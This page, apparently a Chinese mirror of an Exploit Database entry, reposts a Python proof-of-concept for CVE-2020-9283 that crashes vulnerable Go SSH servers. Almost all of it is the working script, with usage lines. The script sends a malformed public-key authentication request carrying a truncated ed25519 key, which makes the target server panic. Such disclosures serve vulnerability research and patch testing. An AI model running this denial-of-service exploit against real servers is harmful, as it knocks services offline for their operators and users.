Go SSH servers 0.0.2 – Denial of Service (PoC)

• Exploit Database
• 115 阅读

• 作者： Mark Adams
  日期： 2020-02-24
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/48121/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62

  # Exploit Title: Go SSH servers 0.0.2 - Denial of Service (PoC) # Author: Mark Adams # Date: 2020-02-21 # Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py # CVE: CVE-2020-9283 # # Running this script may crash the remote SSH server if it is vulnerable. # The GitHub repository contains a vulnerable and fixed SSH server for testing. # # $ python poc.py # ./poc.py <host> <port> <user> # # $ python poc.py localhost 2022 root # Malformed auth request sent. This should cause a panic on the remote server. #   #!/usr/bin/env python   import socket import sys   import paramiko from paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST   if len(sys.argv) != 4: print('./poc.py <host> <port> <user>') sys.exit(1)   host = sys.argv[1] port = int(sys.argv[2]) user = sys.argv[3]   sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port))   t = paramiko.Transport(sock) t.start_client()   t.lock.acquire() m = paramiko.Message() m.add_byte(cMSG_SERVICE_REQUEST) m.add_string("ssh-userauth") t._send_message(m)   m = paramiko.Message() m.add_byte(cMSG_USERAUTH_REQUEST) m.add_string(user) m.add_string("ssh-connection") m.add_string('publickey') m.add_boolean(True) m.add_string('ssh-ed25519')   # Send an SSH key that is too short (ed25519 keys are 32 bytes) m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x15key-that-is-too-short')   # Send an empty signature (the server won't get far enough to validate it) m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x00')   t._send_message(m)   print('Malformed auth request sent. This should cause a panic on the remote server.')